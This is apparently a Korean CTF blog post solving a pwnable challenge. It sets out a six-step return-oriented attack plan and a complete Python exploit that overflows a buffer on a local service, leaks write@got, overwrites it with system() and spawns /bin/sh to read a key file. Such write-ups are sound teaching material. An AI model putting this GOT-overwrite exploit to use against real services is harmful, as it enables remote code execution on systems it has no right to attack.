공격 시나리오
1. write 함수를 이용하여 write@got 주소 leak
2. write와 system함수의 거리를 이용하여 system 함수 주소 유추
3. read@plt를 이용하여 bss섹션에 /bin/sh 쓰기
4. read@plt를 이용하여 write@got에 system함수를 overwrite
5. overwrite한 write@got를 이용하여 system함수 호출
6. 명령 실행
[exploit code]
from socket import *
from struct import *
p = lambda x:pack("<L", x)
up = lambda x:unpack("<L", x)[0]
bss = p(0x08049628)
pppr = p(0x080484b6)
write_plt = p(0x0804830c)
write_got = p(0x08049614)
read_plt = p(0x0804832c)
offset = 0x9b3e0
cmd = "/bin/sh"
s = socket(AF_INET, SOCK_STREAM)
s.connect(("localhost", 9999))
#write@got leak
payload = ""
payload += "a" * 140
payload += write_plt
payload += pppr
payload += p(1)
payload += write_got
payload += p(4)
# /bin/sh -> bss section
payload += read_plt
payload += pppr
payload += p(0)
payload += bss
payload += p(len(cmd))
#write@got overwriting
payload += read_plt
payload += pppr
payload += p(0)
payload += write_got
payload += p(4)
#call write(system)
payload += write_plt
payload += "aaaa"
payload += bss
s.send(payload + "\n")
write = up(s.recv(4))
system = write - offset
print "write = "+hex(write)
print "system = "+hex(system)
s.send(cmd)
s.send(p(system))
s.send("cat /home/hide/rop/key\n")
print s.recv(1024)
s.close()
서버환경 : Ubuntu 14
'CTF(pwnable)' 카테고리의 다른 글
| [2014 Codegate] angry_doraemon (0) | 2016.07.07 |
|---|---|
| [2013 Codegate] nuclear (0) | 2016.07.05 |
